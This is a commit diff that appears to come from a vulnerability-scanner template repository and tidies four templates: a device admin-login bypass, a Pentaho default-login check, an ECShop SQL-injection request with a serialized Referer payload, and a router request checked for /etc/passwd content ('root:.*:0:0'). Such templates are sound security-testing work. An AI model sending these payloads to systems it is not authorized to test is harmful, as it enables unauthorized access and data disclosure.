misc updates
parent
c51bbf8715
commit
cb74944f43
|
@ -25,8 +25,8 @@ requests:
|
||||||
Connection: close
|
Connection: close
|
||||||
X-Requested-With: XMLHttpRequest
|
X-Requested-With: XMLHttpRequest
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
Origin: http://{{Hostname}}/
|
Origin: {{BaseURL}}
|
||||||
Referer: http://{{Hostname}}/
|
Referer: {{BaseURL}}
|
||||||
|
|
||||||
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
|
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
|
||||||
|
|
||||||
|
@ -40,10 +40,10 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "\"result\":true"
|
- '"result":true'
|
||||||
- "id"
|
- 'id'
|
||||||
- "params"
|
- 'params'
|
||||||
- "session"
|
- 'session'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
|
|
@ -6,7 +6,7 @@ info:
|
||||||
severity: high
|
severity: high
|
||||||
metadata:
|
metadata:
|
||||||
shodan-query: 'pentaho'
|
shodan-query: 'pentaho'
|
||||||
tags: pentaho,default-login,panel
|
tags: pentaho,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -7,7 +7,7 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
|
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
|
||||||
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
|
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
|
||||||
tags: sqli,php,cms,ecshop
|
tags: sqli,php,ecshop
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -15,10 +15,7 @@ requests:
|
||||||
GET /user.php?act=login HTTP/1.1
|
GET /user.php?act=login HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
||||||
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
|
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
|
||||||
Accept-Encoding: gzip, deflate
|
|
||||||
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
|
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
|
|
@ -13,9 +13,6 @@ requests:
|
||||||
- |
|
- |
|
||||||
POST / HTTP/1.1
|
POST / HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
|
||||||
Accept-Language: en-US,en;q=0.5
|
|
||||||
Accept-Encoding: gzip, deflate
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Referer: {{BaseURL}}/diagnostic.html?t=201701020919
|
Referer: {{BaseURL}}/diagnostic.html?t=201701020919
|
||||||
Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
|
Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
|
||||||
|
@ -26,9 +23,9 @@ requests:
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0"
|
- "root:.*:0:0"
|
||||||
part: body
|
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
Loading…
Reference in New Issue